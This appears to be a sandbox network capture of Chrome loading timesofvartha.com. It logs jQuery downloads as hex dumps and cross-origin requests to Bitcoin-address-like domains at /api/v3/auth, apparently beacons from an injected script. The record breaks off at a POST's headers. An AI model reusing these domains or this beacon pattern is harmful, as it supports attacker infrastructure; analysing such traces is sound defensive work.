                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 76 61 72 20 74 2c 6e 2c 72 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 70 3b 72 65 74 75 72 6e 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f
                                                                                                                              Data Ascii: var t,n,r=e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.sco
                                                                                                                              2024-11-18 16:56:10 UTC1369INData Raw: 68 69 6c 65 28 6f 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76
                                                                                                                              Data Ascii: hile(o=i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){v
                                                                                                                              2024-11-18 16:56:11 UTC1369INData Raw: 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29
                                                                                                                              Data Ascii: eateElement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e)


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.2.1749754154.216.17.1934436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:12 UTC355OUTGET / HTTP/1.1
                                                                                                                              Host: bc1qlpk73pgj3dz02nq8d9kpdxk.org
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:12 UTC293INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:12 GMT
                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                              Access-Control-Allow-Headers: Content-Type
                                                                                                                              Content-Length: 21
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              2024-11-18 16:56:12 UTC21INData Raw: 53 69 74 65 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 21 21
                                                                                                                              Data Ascii: Site is coming soon!!


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.2.1749755104.17.24.144436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:12 UTC380OUTGET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1
                                                                                                                              Host: cdnjs.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:12 UTC958INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:12 GMT
                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Cache-Control: public, max-age=30672000
                                                                                                                              ETag: W/"603e8adc-15d9d"
                                                                                                                              Last-Modified: Tue, 02 Mar 2021 18:58:36 GMT
                                                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                              Timing-Allow-Origin: *
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              CF-Cache-Status: HIT
                                                                                                                              Age: 1021661
                                                                                                                              Expires: Sat, 08 Nov 2025 16:56:12 GMT
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BdjRgjicjXJA0Nvp210RHQgbtNST3ovbaho49L56WxmdQtNP8sUH460dTIKyS%2B5o1kcsRhTJRI0yogVpY96A4QezEhRGyPhg0SG%2BVbUKkpNbAVQWT0AUuJToeR8LYqqYMwPyZCED"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497e145bf4479f-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:56:12 UTC411INData Raw: 33 39 37 36 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                              Data Ascii: 3976/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 6f 74 79 70 65 4f 66 2c 73 3d 74 2e 73 6c 69 63 65 2c 67 3d 74 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 75 3d 74 2e 70 75 73 68 2c 69 3d 74 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 6f 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 76 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 76 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 79 3d 7b 7d 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20
                                                                                                                              Data Ascii: otypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6e 3d 2b 65 2b 28 65 3c 30 3f 74 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70
                                                                                                                              Data Ascii: st:function(){return this.eq(-1)},even:function(){return this.pushStack(S.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(S.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.p
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 6d 61 6b 65 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 7c 7c 5b 5d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 65 26 26 28 70 28 4f 62 6a 65 63 74 28 65 29 29 3f 53 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 75 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 69 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 74 2e 6c 65 6e 67 74 68 2c 72 3d 30 2c 69 3d 65 2e
                                                                                                                              Data Ascii: ll(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(p(Object(e))?S.merge(n,"string"==typeof e?[e]:e):u.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:i.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c 5d 22 2c 46 3d 22 3a 28 22 2b 49 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 57 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 42 3d 6e 65 77 20 52 65 67 45 78 70 28 4d 2b 22 2b 22 2c 22 67 22 29 2c 24 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d
                                                                                                                              Data Ascii: )"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",B=new RegExp(M+"+","g"),$=new RegExp("^"+M+"+|((?:^|[^\\\\]
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 7b 64 69 72 3a 22 70 61 72 65 6e 74 4e 6f 64 65 22 2c 6e 65 78 74 3a 22 6c 65 67 65 6e 64 22 7d 29 3b 74 72 79 7b 48 2e 61 70 70 6c 79 28 74 3d 4f 2e 63 61 6c 6c 28 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 70 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 74 5b 70 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 65 29 7b 48 3d 7b 61 70 70 6c 79 3a 74 2e 6c 65 6e 67 74
                                                                                                                              Data Ascii: 16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(t=O.call(p.childNodes),p.childNodes),t[p.childNodes.length].nodeType}catch(e){H={apply:t.lengt
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 53 5d 3d 21 30 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 76 61 72 20 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 66 69 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69
                                                                                                                              Data Ascii: =[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[S]=!0,e}function ce(e){var t=C.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChi
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 6e 2c 72 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 70 3b 72 65 74 75 72 6e 20 72 21 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 70 21 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e 74 6f 70 21 3d 3d 6e 26 26 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 6f 65 2c 21 31 29 3a 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 6e 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 75 6e 6c 6f 61 64 22 2c 6f 65 29 29 2c 64 2e 73 63 6f 70 65 3d 63 65 28
                                                                                                                              Data Ascii: n,r=e?e.ownerDocument||e:p;return r!=C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),p!=C&&(n=C.defaultView)&&n.top!==n&&(n.addEventListener?n.addEventListener("unload",oe,!1):n.attachEvent&&n.attachEvent("onunload",oe)),d.scope=ce(
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 3d 69 5b 72 2b 2b 5d 29 69 66 28 28 6e 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 29 26 26 6e 2e 76 61 6c 75 65 3d 3d 3d 65 29 72 65 74 75 72 6e 5b 6f 5d 7d 72 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72
                                                                                                                              Data Ascii: =i[r++])if((n=o.getAttributeNode("id"))&&n.value===e)return[o]}return[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r
                                                                                                                              2024-11-18 16:56:12 UTC1369INData Raw: 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4d 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 64 69 73 61 62
                                                                                                                              Data Ascii: ement("input");t.setAttribute("type","hidden"),e.appendChild(t).setAttribute("name","D"),e.querySelectorAll("[name=d]").length&&v.push("name"+M+"*[*^$|!~]?="),2!==e.querySelectorAll(":enabled").length&&v.push(":enabled",":disabled"),a.appendChild(e).disab


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.2.1749757188.114.96.34436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:14 UTC531OUTOPTIONS /api/v3/auth HTTP/1.1
                                                                                                                              Host: bc1qcr8muz00d2v7uqg5ggulrmm.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Accept: */*
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:15 UTC1031INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:15 GMT
                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                              Content-Length: 2
                                                                                                                              Connection: close
                                                                                                                              vary: Origin
                                                                                                                              access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
                                                                                                                              access-control-max-age: 600
                                                                                                                              access-control-allow-credentials: true
                                                                                                                              access-control-allow-origin: https://timesofvartha.com
                                                                                                                              access-control-allow-headers: content-type
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gDw%2B4BaRNj6fLDMnBJQh0DVuOZKsI6KZ2nJqJT03lEq4CAgXbGqP4IwTrh6Ut2Y940uAcjvtuZIcanZpU5zE%2BfxmX6iRaZ92ritWkcDsYgt54diMjH6mLCky2SxjUg%2FKCf8VZd4QwFc6kJFsAPze9CN6"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497e268f2851e8-DEN
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19108&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2882&recv_bytes=1109&delivery_rate=151686&cwnd=32&unsent_bytes=0&cid=06f658c13c95c084&ts=679&x=0"
                                                                                                                              2024-11-18 16:56:15 UTC2INData Raw: 4f 4b
                                                                                                                              Data Ascii: OK


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.2.174975935.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:16 UTC570OUTOPTIONS /report/v4?s=gDw%2B4BaRNj6fLDMnBJQh0DVuOZKsI6KZ2nJqJT03lEq4CAgXbGqP4IwTrh6Ut2Y940uAcjvtuZIcanZpU5zE%2BfxmX6iRaZ92ritWkcDsYgt54diMjH6mLCky2SxjUg%2FKCf8VZd4QwFc6kJFsAPze9CN6 HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Origin: https://bc1qcr8muz00d2v7uqg5ggulrmm.com
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:16 UTC336INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              access-control-max-age: 86400
                                                                                                                              access-control-allow-methods: POST, OPTIONS
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                              date: Mon, 18 Nov 2024 16:56:15 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              40192.168.2.1749760188.114.96.34436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:16 UTC671OUTPOST /api/v3/auth HTTP/1.1
                                                                                                                              Host: bc1qcr8muz00d2v7uqg5ggulrmm.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 172
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                              Content-Type: application/json
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Origin: https://timesofvartha.com
